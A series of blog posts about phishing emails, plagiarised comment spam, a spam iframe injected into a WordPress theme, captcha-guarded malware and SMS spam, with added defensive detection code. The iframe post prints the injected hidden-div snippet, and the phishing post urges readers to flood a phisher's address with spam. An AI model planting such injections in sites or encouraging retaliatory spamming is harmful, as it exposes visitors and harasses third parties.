Stupid Phishers

Last night at 10:20PM CST, the droid’s green status light started blinking. It was an email on one’s school email. Titled “An Important Message From The University of Minnesota”, the message claimed that one needed to provide information in order to retain one’s email account after a mail server upgrade. 25 minutes later the message was sent again. The email, in its textual entirety, is as follows:

Dear Webmail User,

Due to high volume of unused account on our server and the upgrade of The University of Minnesota webmail Service, we hereby request every webmail account holders to submit the below information for our server upgrade purposes.

Name:

Email:

Password:

Department:

failure to submit the above information may lead to automatic closure of your webmail account as we are upgrading our server to serve you best.

We appreciate your continued co-operation.

Well, let’s see here. Let’s start with information the sender already had (if they were legitimate). Anyone that has a University of Minnesota email can find the full name behind any UMN email address, so asking for one’s name was not necessary. Second, asking for one’s email address, why? Seriously, emails don’t just randomly appear in inboxes (well, truth be told, Gmail has delivered mail not addressed to one in one’s inbox before).

Now onto the information that sender doesn’t need to know (to do their job, assuming they are legitimate). One’s password, which one did they want, the email one? Oh wait, with the way the University does its online authentication, the password would be one’s x500 password. The fact that the University uses a global authentication system means that the password is irrelevant for email servers (or any individual server for that matter). Never mind the fact that you should never, under any circumstances send a password via email (especially to unknown recipients). Finally, the request for one’s department. Well that one makes even less sense. One’s department is completely irrelevant to one’s University email account.

At one point, one was tempted to reply with fake information (possibly containing highly inflammatory language). Looking at the headers, one found that the email was sent through Yahoo’s mail servers (originating from att-entries@att.net), and the reply-to address was securies.edu@gmail.com (feel free to sign this address up for copious amounts of spam, send fake replies to undermine their phishing operations, or do both).

If all of that wasn’t enough to place the message into the spam/phisher bin, there was the top image, linked from a non-UMN website. The phisher also used a footer that official UMN email has not used for at least a semester now.
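The checks walked through above (sender domain, reply-to domain, and a request for a password in the body), as an added example that is not part of the original post. The message is constructed, with placeholder addresses standing in for the ones quoted above.

```python
"""Added example, not from the original post: the header and body checks the
post walks through by hand, as a small filter."""
from email import message_from_string
from email.utils import parseaddr

# Constructed message modelled on the one quoted above: sent from one provider,
# replies routed to a second, neither at the organisation named in the subject.
SAMPLE = """From: "UMN Webmail" <helpdesk@example-isp.test>
Reply-To: replies@example-freemail.test
Subject: An Important Message From The University of Minnesota
To: student@umn.edu

Dear Webmail User,
Please submit your Name, Email, Password and Department for our server upgrade.
"""

SENSITIVE = ("password",)  # fields a real mail admin never needs sent back by email

def domain_of(header_value):
    """Bare domain of the address in a header, or '' if there is none."""
    addr = parseaddr(header_value)[1].lower()
    return addr.rpartition("@")[2] if "@" in addr else ""

def in_org(domain, claimed_domain):
    return domain == claimed_domain or domain.endswith("." + claimed_domain)

def phishing_indicators(raw_message, claimed_domain):
    """Reasons to bin the message, given the domain of the organisation it claims to speak for."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From", ""))
    reply_dom = domain_of(msg.get("Reply-To", ""))
    body = msg.get_payload().lower()
    reasons = []
    if from_dom and not in_org(from_dom, claimed_domain):
        reasons.append(f"From is at {from_dom}, not {claimed_domain}")
    if reply_dom and reply_dom != from_dom:
        reasons.append(f"Reply-To ({reply_dom}) differs from From ({from_dom})")
    if reply_dom and not in_org(reply_dom, claimed_domain):
        reasons.append(f"Reply-To is at {reply_dom}, not {claimed_domain}")
    if any(word in body for word in SENSITIVE):
        reasons.append("asks for a password by email")
    return reasons

if __name__ == "__main__":
    for reason in phishing_indicators(SAMPLE, "umn.edu"):
        print("-", reason)
```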

-John Havlik

[end of transmission, stay tuned]

New Spamming Tactics

Something caught one’s eye today: there was a new comment that seemed far too familiar. The chosen name for the commenter may have been a complete giveaway. However, one has seen people with legitimate comments use their website name as their alias. It did not take much effort to find where the comment’s body came from; they were one’s own words from a comment placed earlier on a post, over a month ago. Differentiating between simple, misguided plagiarism and spam required looking at the site linked to as the commenter’s “website” (in this case only its URI was needed: some World of Warcraft gold selling site).

This seems to be the “holy grail” of comment spam: producing “relevant” comments while linking to whatever site they are promoting. Spam Karma 2 even thought it was valid; SK2 is losing its effectiveness. While in this case the site was not relevant, the body of the comment was relevant to the discussion. It took plagiarism to accomplish it, but for people already breaking laws what’s another broken law (plagiarism is a form of copyright violation/theft).

To protect against this new breed of spam, a few things could be done. The first is, in the case of SK2, that the comment author’s website URI needs to be checked against a distributed blacklist just as all other URIs in the comment body are (SK2 probably already does this, but the site was not on the list yet). Secondly, comments should be checked for an “originality” percentage. Basically, this would compare a new comment against the other comments on the post, and then, among the potential matches, find how close it is to each of them. This would prevent direct sentence, paragraph and comment plagiarism/lifting. Ultimately, making code behave as a human would is the goal. If all else fails, improving the ability to find the person behind the spam so that justice may be brought to him (or her) would suffice.
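The two checks proposed above, an author-URL blacklist and an originality percentage against the post’s earlier comments, as an added example. This is not Spam Karma 2’s code; the existing comments, blacklist host and 30% floor are constructed assumptions.

```python
"""Added example, not part of the original post or of Spam Karma 2: blacklist
the comment author's site, and score a new comment's originality against the
other comments already on the post."""
from difflib import SequenceMatcher
from urllib.parse import urlparse

# Constructed data: two earlier comments on a post, and a blacklist of promotion sites.
EXISTING_COMMENTS = [
    "Spam Karma 2 has worked well for me, though it misses trackback spam lately.",
    "I switched to Akismet after SK2 started passing obvious link drops.",
]
BLACKLISTED_HOSTS = {"example-gold-seller.test"}

def author_site_blacklisted(author_url, blacklist=BLACKLISTED_HOSTS):
    """True if the commenter's 'website' host is on the blacklist (subdomains included)."""
    host = (urlparse(author_url).hostname or "").lower()
    return any(host == b or host.endswith("." + b) for b in blacklist)

def _normalise(text):
    return " ".join(text.lower().split())

def max_similarity(new_comment, existing):
    """Highest similarity ratio (0..1) between the new comment and any earlier one."""
    target = _normalise(new_comment)
    return max((SequenceMatcher(None, target, _normalise(c)).ratio() for c in existing),
               default=0.0)

def originality_percent(new_comment, existing):
    """100 means nothing in common with earlier comments; 0 means a verbatim lift."""
    return round(100 * (1 - max_similarity(new_comment, existing)), 1)

def is_lifted_spam(new_comment, author_url, existing=EXISTING_COMMENTS, floor=30.0):
    """Spam if the author link is blacklisted, or the body is mostly lifted
    from a comment already on the same post."""
    return (author_site_blacklisted(author_url)
            or originality_percent(new_comment, existing) < floor)

if __name__ == "__main__":
    lifted = "spam karma 2 has worked  well for me, though it misses trackback spam lately."
    print(originality_percent(lifted, EXISTING_COMMENTS),
          is_lifted_spam(lifted, "http://www.example-gold-seller.test/"))
```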

-John Havlik

[end of transmission, stay tuned]

Klikvp.com Exploit

Even though things are updated regularly on this blog, an iframe-based exploit was discovered today. Unlike the previous iframe attack, which came through a SQL injection, this one involved modified theme files. Unlike the previous googlerank.info iframe attack, this one’s payload does not appear to be malicious; rather, it is spammy.

There are a few things that point to some level of sophistication in the injection. First off, the code was injected at the end of the header.php file, only on the active theme. Typically, a script kiddie will not bother figuring out which theme is in use and instead will carpet bomb the place with malicious code. Secondly, the modification date on the file matches the last time the header was uploaded from the testbed. No, the testbed’s code was not compromised. This points to a possible Windows exploit (yes, the Weblogs.us server still runs on Windows, unfortunately), as any changes should have caused the modification date and time to update. Finally, rather than having the iframe hidden via CSS, there is a container div which is hidden instead, making it more difficult to have a general CSS rule to expose the iframe.

< div style="display:none" >< iframe src="http://klikvp.com/css/go.php?sid=1" frameborder="0" height="1" width="1" >< /iframe >< /div >

That is the offending code. Spaces were added to prevent execution. Klikvp is the same as Klikvip, which is a known spammer. The tricky sucker is using a wrapping div now. The good news is that WordPress Exploit Scanner will find this, so keeping it around and periodically scanning is a good thing to do. It doesn’t offer dashboard notifications like Iframe-b-gone does, but it scans files and other things that Iframe-b-gone does not.
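A scanner for exactly this pattern (an iframe wrapped in a hidden div rather than hidden by its own CSS), as an added example; it is not the code of WordPress Exploit Scanner or Iframe-b-gone. The sample header.php content is constructed with a placeholder host, and the theme directory it scans is a temporary one created by the block.

```python
"""Added example (not WordPress Exploit Scanner's or Iframe-b-gone's code): find
iframes wrapped in a hidden container div inside theme files, and report the
file, line and iframe src so the injection can be located and removed."""
import re
import tempfile
from pathlib import Path

# Constructed sample modelled on the injected snippet above, placeholder host.
SAMPLE_HEADER = """<?php wp_head(); ?>
</head>
<body>
<div style="display:none"><iframe src="http://hidden-host.example/css/go.php?sid=1" frameborder="0" height="1" width="1"></iframe></div>
"""

# A div whose inline style hides it, followed before that div closes by an iframe with a src.
HIDDEN_DIV_IFRAME = re.compile(
    r'<div[^>]*style\s*=\s*["\'][^"\']*(?:display\s*:\s*none|visibility\s*:\s*hidden)[^"\']*["\'][^>]*>'
    r'(?:(?!</div>).)*?<iframe[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE | re.DOTALL,
)

def find_hidden_iframes(text):
    """Return [(line_number, src), ...] for every iframe hidden by a wrapping div."""
    return [(text.count("\n", 0, m.start()) + 1, m.group(1))
            for m in HIDDEN_DIV_IFRAME.finditer(text)]

def scan_theme(theme_dir, patterns=("*.php", "*.html", "*.js")):
    """Walk a theme directory; return {relative_path: hits} for files that contain hits."""
    root = Path(theme_dir)
    report = {}
    for pattern in patterns:
        for path in sorted(root.rglob(pattern)):
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

def demo():
    """Write the constructed sample into a temporary theme directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "header.php").write_text(SAMPLE_HEADER)
        (Path(d) / "footer.php").write_text("</body></html>\n")  # clean file, no hit
        return scan_theme(d)

if __name__ == "__main__":
    print(demo())
```

A general rule such as `iframe { display: block }` would not reveal this injection because the parent div stays hidden, which is why the scan looks at the wrapping div rather than the iframe’s own style.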

-John Havlik

[end of transmission, stay tuned]

Uninstall Captchas?

Software follows a life cycle on a computer, which begins with installation and ends in uninstallation. Uninstallation may happen for various reasons: a new version of the software, or freeing disk space for other things. Removing software should be less painful than installation. Software that is difficult to remove is evil. Viruses and spyware/malware typically make the removal process as painful as possible. Oddly enough, Symantec does the same thing with their consumer grade “Security Software”.

(Image: Are you human?)

While working on a computer for a neighbor, I came across a few toolbars and other general junk installed on the computer. Even though toolbars usually are not spyware, there is no reason to have the Google, Yahoo, and Ask toolbars installed plus a few others. The uninstallers were one- or two-click affairs, pretty standard stuff. Then came the odd software. No one knew what it was, but it was sitting on the installed applications list. Before uninstalling, the user was prompted to fill out a captcha to prove that they were not a computer. After filling it out, the uninstall process proceeded as usual. A second software package had the same sort of thing, but it was a tad more sophisticated: it had animated noise bars. Either way, why are these software writers afraid of automated removal of their software? It is pretty obvious: they wrote malware.

What did it do? Well, the obvious thing was auto-spawning and eating up 50% of the CPU resources (the system has a Pentium D 820 processor). It disguised itself as Internet Explorer (why anyone still uses IE is beyond comprehension). Additionally, it would cause periodic pop-ups and an odd message alert prompt stating “Windows Explorer” when entering Control Panel.

-John Havlik

[end of transmission, stay tuned]

SMS Spammer

Didn’t see that one coming. Now that proxy dialers exist on the internet, it’s no surprise that some internet-to-SMS services exist now. The sad thing is they are being abused at the expense of the message recipient.

Back on the 24th of January, a spammer by the name of Giovanni@instantmash.com sent a text message to my cellphone advertising getwellwontyoust.com. Usually e-mail spam’s only cost is time and bandwidth, and for the end user bandwidth is usually unlimited. For SMS, the cost is 50 cents per message received, plus an additional 50 cents for connection (with Verizon, as SMS is not part of my plan since I don’t text people). Luckily, I believe Verizon will be removing the charges as it was spam; otherwise I’ll use the WHOIS information for both the spammed address and the sender and send them a bill.

A quick Google search reveals that instantmash.com has been suspended and that getwellwontyoust.com is a sex spam site. Looks like the latter is registered to one Natalie Wood, of Sacramento, California. Natalie Wood is most likely a pseudonym, as the fax number is invalid (area code 555) and I have doubts on the legitimacy of the provided phone number of (916) 742-3301. Under federal law and the precedent set in the class action lawsuit Shen v. Distributive Networks LLC, No. 06 C 4403, the offender may owe me and anyone else he or she SMS-spammed up to 150 USD in damages.

-John Havlik

[end of transmission, stay tuned]